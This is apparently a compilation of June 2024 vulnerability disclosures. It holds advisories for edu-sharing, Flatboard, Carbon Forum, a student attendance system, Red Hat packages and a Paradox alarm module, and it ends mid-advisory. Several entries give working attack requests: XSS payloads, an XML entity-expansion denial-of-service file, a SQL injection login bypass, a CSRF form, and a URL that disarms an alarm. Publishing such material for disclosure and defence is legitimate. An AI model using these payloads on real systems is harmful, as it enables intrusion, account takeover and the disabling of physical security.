Edu-Sharing suffers from an arbitrary file upload vulnerability. Versions below 8.0.8-RC2, 8.1.4-RC0, and 9.0.0-RC19 are affected.

SEC Consult Vulnerability Lab Security Advisory < 20240620-0 >  
=======================================================================  
               title: Arbitrary File Upload  
             product: edu-sharing (metaVentis GmbH)  
vulnerable versions: <8.0.8-RC2, <8.1.4-RC0, <9.0.0-RC19  
      fixed versions: >=8.0.8-RC2, >=8.1.4-RC0, >=9.0.0-RC19  
          CVE number: CVE-2024-28147  
              impact: high  
            homepage: https://edu-sharing.com  
               found: 2024-04-04  
                  by: Kai Zimmermann (Office Frankfurt)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Eviden business  
                      Europe | Asia

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"edu-sharing software enables you to network your learning platforms and other  
educational software. Share learning content, metadata and tools - make them  
available in an educational cloud and let your users use them in all connected  
systems."

Source: https://edu-sharing.com

Business recommendation:  
------------------------  
The vendor provides a patch which should be installed immediately.

SEC Consult highly recommends to perform a thorough security review of the product  
conducted by security professionals to identify and resolve potential further  
security issues.

Vulnerability overview/description:  
-----------------------------------  
1) Arbitrary File Upload (CVE-2024-28147)  
An authenticated user can upload arbitrary files in the upload function for  
collection preview images. An attacker may upload an HTML file that includes  
malicious JavaScript code which will be executed if a user visits the direct  
URL of the collection preview image (Stored Cross Site Scripting). It is also  
possible to upload SVG files that include nested XML entities. Those are parsed  
when a user visits the direct URL of the collection preview image, which may be  
utilized for a Denial of Service attack.

Proof of concept:  
-----------------  
1) Arbitrary File Upload (CVE-2024-28147)  
An authenticated user can update the preview image of an existing collection  
by sending the following request:

--------------------------------------------------------------------------------  
POST /edu-sharing/rest/collection/v1/collections/-home-/$COLLECTIONID/icon?mimetype=image%2Fpng HTTP/1.1  
Host: $SERVER  
Cookie: INGRESSCOOKIE=$INGRESSCOOKIE; JSESSIONID=$SESSIONID  
Content-Type: multipart/form-data; boundary=---------------------------159605426213527963452762824885  
Content-Length: 288

-----------------------------159605426213527963452762824885  
Content-Disposition: form-data; name="file";

‰PNG

[...]  
-----------------------------159605426213527963452762824885--  
--------------------------------------------------------------------------------

The URL parameter "mimetype" can be modified to match any uploaded file. The  
value is directly used in the server's "Content-Type" header.  
Both, the Content-Type request header and the filename parameter in the  
Content-Disposition request header do not need to be included in the data  
boundary inside the request in order to be sent successfully and can therefore  
be removed.  
The preview image can then be accessed by visiting the following URL:  
https://$SERVER/edu-sharing/preview?nodeId=$COLLECTIONID

a. Stored Cross Site Scripting (HTML Upload)  
The initial request can be modified to include an HTML file, while keeping  
the magic bytes of a PNG image file. The "mimetype" parameter is changed to  
"text/html":

--------------------------------------------------------------------------------  
POST /edu-sharing/rest/collection/v1/collections/-home-/$COLLECTIONID/icon?mimetype=text/html HTTP/1.1  
Host: $SERVER  
Cookie: INGRESSCOOKIE=$INGRESSCOOKIE; JSESSIONID=$SESSIONID  
Content-Type: multipart/form-data; boundary=---------------------------159605426213527963452762824885  
Content-Length: 288

-----------------------------159605426213527963452762824885  
Content-Disposition: form-data; name="file";

‰PNG

<!DOCTYPE html>  
<html>  
<body>  
<h1>Test</h1>  
<script>alert(window.location)</script>  
</body>  
</html>  
-----------------------------159605426213527963452762824885--  
--------------------------------------------------------------------------------

Visiting the preview URL as seen in figure 1 below shows that the JavaScript  
code is executed:  
[01_stored_xss.png]

b. Denial of Service (SVG Upload)  
The initial request can be modified to upload an SVG file containing  
nested XML entities. The "mimetype" parameter is changed to "image%2Fsvg":

--------------------------------------------------------------------------------  
POST /edu-sharing/rest/collection/v1/collections/-home-/$COLLECTIONID/icon?mimetype=image%2Fsvg HTTP/1.1  
Host: $SERVER  
Cookie: INGRESSCOOKIE=$INGRESSCOOKIE; JSESSIONID=$SESSIONID  
Content-Type: multipart/form-data; boundary=---------------------------29539943986372261721095197803  
Content-Length: 581

-----------------------------29539943986372261721095197803  
Content-Disposition: form-data; name="file";

<?xml version="1.0" encoding="UTF-8"?>  
<!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY bar "Text "><!ENTITY t1   
"&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;"><!ENTITY t2 "&t1;&t1;&t1;&t1;">]>  
<svg xmlns="http://www.w3.org/2000/svg">  
  <data>&t2;</data>  
</svg>

-----------------------------29539943986372261721095197803--  
--------------------------------------------------------------------------------

Visiting the preview URL as seen in figure 2 below shows that the XML code is  
parsed:  
[02_denial_of_service]

Vulnerable / tested versions:  
-----------------------------  
The following version has been tested which was the latest version available  
at the time of the test:  
* 9.0 (pre-release)

The vendor confirmed that previous versions (8.0 and 8.1) are affected as well.

Vendor contact timeline:  
------------------------  
2024-04-10: Contacting vendor through security@edu-sharing.com  
2024-04-11: Vendor replied and confirmed security contact.  
             Advisory information has been sent to vendor.  
2024-04-12: Vendor confirmed receiving the advisory and is now trying to  
             reproduce the described behavior.  
2024-05-03: Reminder sent to security@edu-sharing.com, asking for an update on  
             fixing the vulnerability.  
2024-05-07: Vendor provides affected versions. Fixes have already been implemented  
             and published. Vendor is requesting to wait with the public advisory  
             release in order to allow affected customers to perform the next rollout.  
2024-05-07: Vendor provides fixed versions.  
             Public advisory release scheduled for 2024-06-04.  
2024-05-15: Public advisory release postponed to 2024-06-20.  
2024-06-20: Coordinated release of advisory.

Solution:  
---------  
The repository base version in use can be identified in the Admin-Tools.  
The vendor provides a patch for the affected versions:  
* Version 8.0: Update repository version to "8.0.8-RC2" or later  
* Version 8.1: Update repository version to "8.1.4-RC0" or later  
* Version 9.0: Update repository version to "9.0.0-RC19" or later

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab  
An integrated part of SEC Consult, an Eviden business  
Europe | Asia

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Eviden business. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: https://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF Kai Zimmermann / 2024

Edu-Sharing Arbitrary File Upload

Flatboard version 3.2 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Flatboard v3.2  - Stored XSS# Date: 2024-06-23# Exploit Author: tmrswrr# Category : Webapps# Vendor Homepage: https://flatboard.org/# Version: 3.2----------------------------------------------------------------------------------------------------1-Login admin panel , go to this url : https://127.0.0.1//Flatboard/index.php/forum2-Click Add Forum and write in  Information field your payload : "><img src=x onerrora=confirm() onerror=confirm(document.cookie)>3-Save it , you will be see alert button

Flatboard 3.2 Cross Site Scripting

Carbon Forum version 5.9.0 suffers from access control, cross site request forgery, file upload, outdated library, and remote SQL injection vulnerabilities.

    {-} Title => Carbon Forum 5.9.0 - Multiple Exploits{-} Author => bRpsd [cy@Live.no]{-} Date Release => 22 June, 2024{-} Vendor => Carbon Forum <= 5.9.0    Homepage => https://www.94cb.com/  Download => https://github.com/lincanbin/Carbon-Forum  Vulnerable Versions => 5.9.0 >=  Tested Version => 5.9.0 on xampp Server.#######################################################################################Vulnerability #1 : Reset Administrator Password & Database settingsFile Path: http://localhost/Carbon-Forum/install/INFO: The install folder remains after installation which allows attackers to recreate a new DB and have an admin account by default through registering the first user##############################################################################################################################################################################Vulnerability #2 : SQL InjectionVulnerable Code: /Carbon-Forum/install/index.phpif ($_SERVER['REQUEST_METHOD'] == 'POST') {  $fp = fopen(__DIR__ . '/database.sql', "r") or die("SQL文件无法打开。  The SQL File could not be opened.");  //dobefore  if (isset($_POST["Language"]) && isset($_POST["DBHost"]) && isset($_POST["DBName"]) && isset($_POST["DBUser"]) && isset($_POST["DBPassword"])) {    $Language = $_POST['Language'];    $DBHost = $_POST['DBHost'];    $DBName = $_POST['DBName'];    $DBUser = $_POST['DBUser'];    $DBPassword = $_POST['DBPassword'];    $SearchServer = $_POST['SearchServer'];    $SearchPort = $_POST['SearchPort'];    $EnableMemcache = $_POST['EnableMemcache'];    $MemCachePrefix = $_POST['MemCachePrefix'];  } else {    die("An Unexpected Error Occured!");  }  //$WebsitePath = $_POST['WebsitePath'];  $WebsitePath = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];  if (preg_match('/(.*)\/install/i', $WebsitePath, $WebsitePathMatch)) {    $WebsitePath = $WebsitePathMatch[1];  } else {    $WebsitePath = '';  }  //初始化数据库操作类  require('../library/PDO.class.php');  $DB = new Db($DBHost, 3306, '', $DBUser, $DBPassword);  $DatabaseExist = $DB->single("SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA WHERE SCHEMA_NAME = :DBName", array('DBName' => $DBName));  if (empty($DatabaseExist)) {    $DB->query("CREATE DATABASE IF NOT EXISTS " . $DBName . ";");  }    POC Request:POST http://localhost/Carbon-Forum/install/?Host: localhostUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, br, zstdContent-Type: application/x-www-form-urlencodedContent-Length: 173Origin: http://localhostConnection: keep-aliveReferer: http://localhost/Carbon-Forum/install/Cookie: CarbonBBS_View=desktop; CarbonBBS_UserID=5; CarbonBBS_UserExpirationTime=1721643860; CarbonBBS_UserCode=3ff84d77640629e72e311cd7a52e5df7; PHPSESSID=addf2aa242dcb91d00faf41e6d6b07b3Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Language=en&DBHost=localhost&DBName=&DBUser=test'&DBPassword=&SearchServer=&SearchPort=&EnableMemcache=false&MemCachePrefix=carbon_&submit=安 装 / InstallResponse:SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '' at line 1You can find the error back in the log.#######################################################################################################################################################################################################Vulnerability #3 : CSRF - Change users email File Path: http://localhost/Carbon-Forum/settingsMethod: POSTParameter : UserMailCode:Carbon-Forum/controller/settings.phpPOC:    case 'UpdateUserInfo':      $CurUserInfo['UserSex']      = intval(Request('POST', 'UserSex', 0));      $CurUserInfo['UserMail']     = IsEmail(Request('POST', 'UserMail', $CurUserInfo['UserMail'])) ? Request('POST', 'UserMail', $CurUserInfo['UserMail']) : $CurUserInfo['UserMail'];      $CurUserInfo['UserHomepage'] = CharCV(Request('POST', 'UserHomepage', $CurUserInfo['UserHomepage']));      $CurUserInfo['UserIntro']    = CharCV(Request('POST', 'UserIntro', $CurUserInfo['UserIntro']));      $UpdateUserInfoResult        = UpdateUserInfo(array(        'UserSex' => $CurUserInfo['UserSex'],        'UserMail' => $CurUserInfo['UserMail'],        'UserHomepage' => $CurUserInfo['UserHomepage'],        'UserIntro' => $CurUserInfo['UserIntro']      ));      if ($UpdateUserInfoResult) {        $UpdateUserInfoMessage = $Lang['Profile_Modified_Successfully'];<form method='POST' action='http://localhost/Carbon-Forum/settings'>        <input type="hidden" name="Action" value="UpdateUserInfo">        <input type="hidden" name="UserSex" value="0">        <input type="hidden" name="UserMail" value="changed@new-email.com">        <input type="hidden" name="UserHomepage" value="">        <input type="hidden" name="UserIntro" value="">      <input type='submit' value='submit'>    </form>    #######################################################################################################################################################################################################Vulnerability #4 : Arbitrary File Upload - RCE [Authenticated]Info: Administrator can change allowed files in dashboard -> parameterPOC POST:http://localhost/Carbon-Forum/dashboard#dashboard4Host: localhostUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, br, zstdContent-Type: application/x-www-form-urlencodedContent-Length: 14662Origin: http://localhostConnection: keep-aliveReferer: http://localhost/Carbon-Forum/dashboardCookie: CarbonBBS_UserID=5; CarbonBBS_UserExpirationTime=1721643860; CarbonBBS_UserCode=3ff84d77640629e72e311cd7a52e5df7; CarbonBBS_View=desktopUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Action=Parameter&UploadParameters=/* 前后端通信相关的配置,注释只允许使用多行方式 */ { /* 上传图片配置项 */ "imageActionName": "uploadimage", /* 执行上传图片的action名称 */ "imageFieldName": "upfile", /* 提交的图片表单名称 */ "imageMaxSize": 4096000, /* 上传大小限制，单位B */ "imageAllowFiles": [".png", ".jpg", ".jpeg", ".gif", ".bmp"], /* 上传图片格式显示 */ "imageCompressEnable": true, /* 是否压缩图片,默认是true */ "imageCompressBorder": 1600, /* 图片压缩最长边限制 */ "imageInsertAlign": "none", /* 插入的图片浮动方式 */ "imageUrlPrefix": "", /* 图片访问路径前缀 */ "imagePathFormat": "/upload/image/{yyyy}{mm}{dd}/{time}{rand:6}", /* 上传保存路径,可以自定义保存路径和文件名格式 */ /* {filename} 会替换成原文件名,配置这项需要注意中文乱码问题 */ /* {rand:6} 会替换成随机数,后面的数字是随机数的位数 */ /* {time} 会替换成时间戳 */ /* {yyyy} 会替换成四位年份 */ /* {yy} 会替换成两位年份 */ /* {mm} 会替换成两位月份 */ /* {dd} 会替换成两位日期 */ /* {hh} 会替换成两位小时 */ /* {ii} 会替换成两位分钟 */ /* {ss} 会替换成两位秒 */ /* 非法字符 \ : * ? " < > | */ /* 具请体看线上文档: fex.baidu.com/ueditor/#use-format_upload_filename */ /* 涂鸦图片上传配置项 */ "scrawlActionName": "uploadscrawl", /* 执行上传涂鸦的action名称 */ "scrawlFieldName": "upfile", /* 提交的图片表单名称 */ "scrawlPathFormat": "/upload/image/{yyyy}{mm}{dd}/{time}{rand:6}", /* 上传保存路径,可以自定义保存路径和文件名格式 */ "scrawlMaxSize": 2048000, /* 上传大小限制，单位B */ "scrawlUrlPrefix": "", /* 图片访问路径前缀 */ "scrawlInsertAlign": "none", "scrawlAllowFiles": [".png", ".jpg", ".jpeg", ".gif", ".bmp"], /* 截图工具上传 */ "snapscreenActionName": "uploadimage", /* 执行上传截图的action名称 */ "snapscreenPathFormat": "/upload/image/{yyyy}{mm}{dd}/{time}{rand:6}", /* 上传保存路径,可以自定义保存路径和文件名格式 */ "snapscreenUrlPrefix": "", /* 图片访问路径前缀 */ "snapscreenInsertAlign": "none", /* 插入的图片浮动方式 */ /* 抓取远程图片配置 */ "catcherLocalDomain": ["127.0.0.1", "localhost", "img.baidu.com"], "catcherActionName": "catchimage", /* 执行抓取远程图片的action名称 */ "catcherFieldName": "source", /* 提交的图片列表表单名称 */ "catcherPathFormat": "/upload/image/{yyyy}{mm}{dd}/{time}{rand:6}", /* 上传保存路径,可以自定义保存路径和文件名格式 */ "catcherUrlPrefix": "", /* 图片访问路径前缀 */ "catcherMaxSize": 2048000, /* 上传大小限制，单位B */ "catcherAllowFiles": [".png", ".jpg", ".jpeg", ".gif", ".bmp"], /* 抓取图片格式显示 */ /* 上传视频配置 */ "videoActionName": "uploadvideo", /* 执行上传视频的action名称 */ "videoFieldName": "upfile", /* 提交的视频表单名称 */ "videoPathFormat": "/upload/video/{yyyy}{mm}{dd}/{time}{rand:6}", /* 上传保存路径,可以自定义保存路径和文件名格式 */ "videoUrlPrefix": "", /* 视频访问路径前缀 */ "videoMaxSize": 20480000, /* 上传大小限制，单位B，默认20MB */ "videoAllowFiles": [ ".flv", ".swf", ".mkv", ".avi", ".rm", ".rmvb", ".mpeg", ".mpg", ".ogg", ".ogv", ".mov", ".wmv", ".mp4", ".webm", ".mp3", ".wav", ".mid"], /* 上传视频格式显示 */ /* 上传文件配置 */ "fileActionName": "uploadfile", /* controller里,执行上传视频的action名称 */ "fileFieldName": "upfile", /* 提交的文件表单名称 */ "filePathFormat": "/upload/file/{yyyy}{mm}{dd}/{time}{rand:6}", /* 上传保存路径,可以自定义保存路径和文件名格式 */ "fileUrlPrefix": "", /* 文件访问路径前缀 */ "fileMaxSize": 2048000, /* 上传大小限制，单位B，默认2MB */ "fileAllowFiles": [ ".png", ".jpg", ".jpeg", ".gif", ".bmp", ".flv", ".swf", ".mkv", ".avi", ".rm", ".rmvb", ".mpeg", ".mpg", ".ogg", ".ogv", ".mov", ".wmv", ".mp4", ".webm", ".mp3", ".wav", ".mid", ".rar", ".zip", ".tar", ".gz", ".7z", ".bz2", ".cab", ".iso", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf", ".txt", ".md", ".xml" ], /* 上传文件格式显示 */ /* 列出指定目录下的图片 */ "imageManagerActionName": "listimage", /* 执行图片管理的action名称 */ "imageManagerListPath": "/upload/image/", /* 指定要列出图片的目录 */ "imageManagerListSize": 60, /* 每次列出文件数量 */ "imageManagerUrlPrefix": "", /* 图片访问路径前缀 */ "imageManagerInsertAlign": "none", /* 插入的图片浮动方式 */ "imageManagerAllowFiles": [".png", ".jpg", ".jpeg", ".gif", ".bmp"], /* 列出的文件类型 */ /* 列出指定目录下的文件 */ "fileManagerActionName": "listfile", /* 执行文件管理的action名称 */ "fileManagerListPath": "/upload/file/", /* 指定要列出文件的目录 */ "fileManagerUrlPrefix": "", /* 文件访问路径前缀 */ "fileManagerListSize": 60, /* 每次列出文件数量 */ "fileManagerAllowFiles": [ ".png", ".jpg", ".jpeg", ".gif", ".bmp", ".flv", ".swf", ".mkv", ".avi", ".rm", ".rmvb", ".mpeg", ".mpg", ".ogg", ".ogv", ".mov", ".wmv", ".mp4", ".webm", ".mp3", ".wav", ".mid", ".rar", ".zip", ".tar", ".gz", ".7z", ".bz2", ".cab", ".iso", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf", ".txt", ".md", ".xml" ] /* 列出的文件类型 */ }&TextFilterParameter=/* 关键词过滤相关的配置,注释只允许使用多行方式 */ { /* 关键词均支持正则表达式，过多的过滤会影响性能 "fuck" : "f**k", 以上规则表示发表含fuck的内容，会被过滤为f**k "negro" : [false, 30], Don't issue text with "negro", or it will freeze for 30 seconds. "蛤" : [false, 30], 以上规则禁止发布含“蛤”的内容，并且尝试发表该内容的用户会被续(jin)掉(yan)30秒生命 "negro" : ["black", 30], "包子" : ["维尼", 30], 以上规则表示发表含"包子"的内容，会被过滤为"维尼"，并且在内容发表成功后，需要再等30秒才能发言 */ /* "fuck" : "f**k", "negro" : [false, 30], "蛤" : [false, 30], "negro" : ["black", 30], "包子" : ["维尼", 30] */ }&submit=Save settings##############################################################################################################################################################################Vulnerability #4 : Vulnerable PHPMailer libraryFile: /Carbon-Forum/library/PHPMailer.class.phpVersion: $Version = '5.2.16';#######################################################################################

Carbon Forum 5.9.0 Cross Site Request Forgery / SQL Injection

Student Attendance Management System version 1.0 suffers from a remote SQL Injection vulnerability that allows for authentication bypass.

    ## Titles: Student Attendance Management System-1.0 Bypass AuthenticationSQLi## Author: nu11secur1ty## Date: 06/22/2024## Vendor: https://github.com/oretnom23## Software:https://www.sourcecodester.com/php/14561/student-attendance-management-system-using-phpmysqli-source-code.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The username parameter is not sanitizing well, the attacker can injectdirect queries into the login form and easily bypass the authentication ofthe admin account.STATUS: CRITICAL- Vulnerability[+]Exploits:- Exploit:```POSTPOST /student_attendance/ajax.php?action=login HTTP/1.1Host: pwnedhost.comCookie: PHPSESSID=2otv2s74md44qhb7do890mhhp4Content-Length: 104Sec-Ch-Ua: "Not/A)Brand";v="8", "Chromium";v="126"Accept-Language: en-USSec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Accept: */*X-Requested-With: XMLHttpRequestSec-Ch-Ua-Platform: "Windows"Origin: https://pwnedhost.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pwnedhost.com/student_attendance/login.phpAccept-Encoding: gzip, deflate, brPriority: u=1, iConnection: keep-aliveusername=nu11secur1ty'+or+1%3D1%23&password=stupiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiid```[+]Response```HTTPHTTP/1.1 200 OKDate: Sat, 22 Jun 2024 06:37:41 GMTServer: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4X-Powered-By: PHP/8.2.4Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Length: 1Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=UTF-81```## Reproduce:[href](https://www.patreon.com/posts/student-system-1-106665723)## Proof and Exploit:[href](https://www.patreon.com/posts/student-system-1-106665723)## Time spent:01:25:00

Student Attendance Management System 1.0 SQL Injection

Red Hat Security Advisory 2024-4051-03 - An update for pki-core is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include a bypass vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4051.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: pki-core security updateAdvisory ID:        RHSA-2024:4051-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:4051Issue date:         2024-06-24Revision:           03CVE Names:          CVE-2023-4727====================================================================Summary: An update for pki-core is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The Public Key Infrastructure (PKI) Core contains fundamental packages required by Red Hat Certificate System.Security Fix(es):* dogtag ca: token authentication bypass vulnerability (CVE-2023-4727)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-4727References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2232218

Red Hat Security Advisory 2024-4051-03

Red Hat Security Advisory 2024-4050-03 - An update for libreswan is now available for Red Hat Enterprise Linux 9.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4050.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: libreswan security updateAdvisory ID:        RHSA-2024:4050-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:4050Issue date:         2024-06-24Revision:           03CVE Names:          CVE-2024-3652====================================================================Summary: An update for libreswan is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Libreswan is an implementation of IPsec and IKE for Linux. IPsec is the Internet Protocol Security and uses strong cryptography to provide both authentication and encryption services. These services allow you to build secure tunnels through untrusted networks such as virtual private network (VPN).Security Fix(es):* libreswan: IKEv1 default AH/ESP responder can crash and restart (CVE-2024-3652)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-3652References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2274448

Red Hat Security Advisory 2024-4050-03

Paradox IP150 Internet Module version 1.40.00 suffers from a cross site request forgery vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

# Paradox IP150 Internet Module Cross-Site Request Forgery #

Link: https://github.com/sbaresearch/advisories/tree/public/2024/SBA-ADV-20240321-01_Paradox_Cross_Site_Request_Forgery

## Vulnerability Overview ##

The Paradox IP150 Internet Module in version 1.40.00 is vulnerable to  
Cross-Site Request Forgery (CSRF) attacks due to  
a lack of countermeasures and the use of the HTTP method `GET` to introduce  
changes in the system.

* **Identifier**            : SBA-ADV-20240321-01  
* **Type of Vulnerability** : Cross-Site Request Forgery (CSRF)  
* **Software/Product Name** : [IP150 Internet Module](https://www.paradox.com/Products/default.asp?CATID=3&SUBCATID=38&PRD=563)  
* **Vendor**                : [Paradox Security Systems (Bahamas) Ltd.](https://www.paradox.com/)  
* **Affected Versions**     : 1.40.00 (possibly others too)  
* **Fixed in Version**      : Not yet  
* **CVE ID**                : CVE-2024-5676  
* **CVSS Vector**           : CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:H  
* **CVSS Base Score**       : 6.8 (Medium)

## Vendor Description ##

> IP150  
> Internet Module  
> Supports SWAN Server  
>  
> Features  
>  
> * Controls and monitors a control panel through an IP network (LAN / WAN / Internet)  
> * Reports control panel events via IP to the Paradox IPR512 GPRS / IP Monitoring Receiver and / or IPRS-7 GPRS / IP PC Receiver Software  
> * Two I/Os on board; controlled via the web interface, triggering an email  
> * Sends notification and alarm system events via email  
> * Arm / Disarm individual partitions via Insite GOLD app  
> * Connects to Swan for easy installation (no port forwarding)  
> * Enables Insite GOLD, or BabyWare to access your system through the Internet  
> * Push notification to Insite GOLD app  
> * HTTPS support for improving security (HyperText Transfer Protocol Secure; a widely used communications protocol for secure communication over a computer network)  
> * Very low bandwidth consumption  
> * Easy installation; built-in clip for mounting in a metal box  
> * Supported language: English  
> * Compatible with EVO Series, Spectra SP Series, MG5000, MG5050 and MG5075

Source: <https://www.paradox.com/Products/default.asp?PID=404>

## Impact ##

An attacker can coerce an administrator into clicking a link, which issues  
a HTTP request that changes the state of the system.  
Depending on the configuration, meaning which downstream component is  
controlled by the affected component, the impact will be different.  
As an example the *IP150 Internet Module* might control an alarm unit.  
Thus an attacker can deactivate the alarm by performing a CSRF attack.

## Vulnerability Description ##

The server cannot verify whether a request was sent intentionally. This  
makes it possible for an attacker to trick a client into making  
unintentional requests to the web server which will be treated as an  
authentic request. In combination with a social engineering attack,  
this allows an attacker to perform server-side actions as the victim.

In addition, the functionality of activation and deactivation of the alarm  
systems, is accessed via a HTTP `GET` request.  
Changing the state of the server with `GET` is discouraged in the HTTP  
standard, since it is defined to be a *safe* method [1].  
This makes the exploitation of the vulnerability easier, as an attacker  
can craft an URL.  
If the victim opens this URL, the CSRF attack is carried out and an action  
is performed.

## Proof of Concept ##

For example, the following HTTP request disables the alarm in area `00`:

```http  
GET /statuslive.html?area=00&value=d HTTP/1.1  
Host: 192.0.2.1  
```

It is vulnerable to CSRF, since it does not apply any CSRF countermeasures.  
Therefore, it is possible to craft an URL that performs this action:

```text  
http://192.0.2.1/statuslive.html?area=00&value=d  
```

## Recommended Countermeasures ##

We are not aware of a vendor fix yet. Please contact the vendor.

A generally valid solution against CSRF, which however requires a server-side  
state, is the implementation of an unpredictable token that is unique for  
each session.  
The OWASP project gives further recommendations [2] [3].

## Timeline ##

* `2024-02-09` Identified the vulnerability in version 1.40.00  
* `2024-02-12` First contact to the system owner to acquire more information about the system configuration and version  
* `2024-03-08` System owner provided all details on the affected system  
* `2024-03-21` First attempt to contact vendor via support email  
* `2024-04-03` Second attempt to contact vendor via web form and support email  
* `2024-06-19` No reaction from vendor to all previous contact attempts  
* `2024-06-19` SBA Research assigned CVE-2024-5676  
* `2024-06-19` Public disclosure

## References ##

1. RFC 7231. HTTP/1.1 Semantics and Content. Safe Methods: <https://datatracker.ietf.org/doc/html/rfc7231#section-4.2.1>  
2. OWASP Cheat Sheet Series. Cross-Site Request Forgery Prevention Cheat Sheet: <https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html>  
3. OWASP Web Security Testing Guide (WSTG) v4.2. Testing for Cross Site Request Forgery: <https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/06-Session_Management_Testing/05-Testing_for_Cross_Site_Request_Forgery.html>

## Credits ##

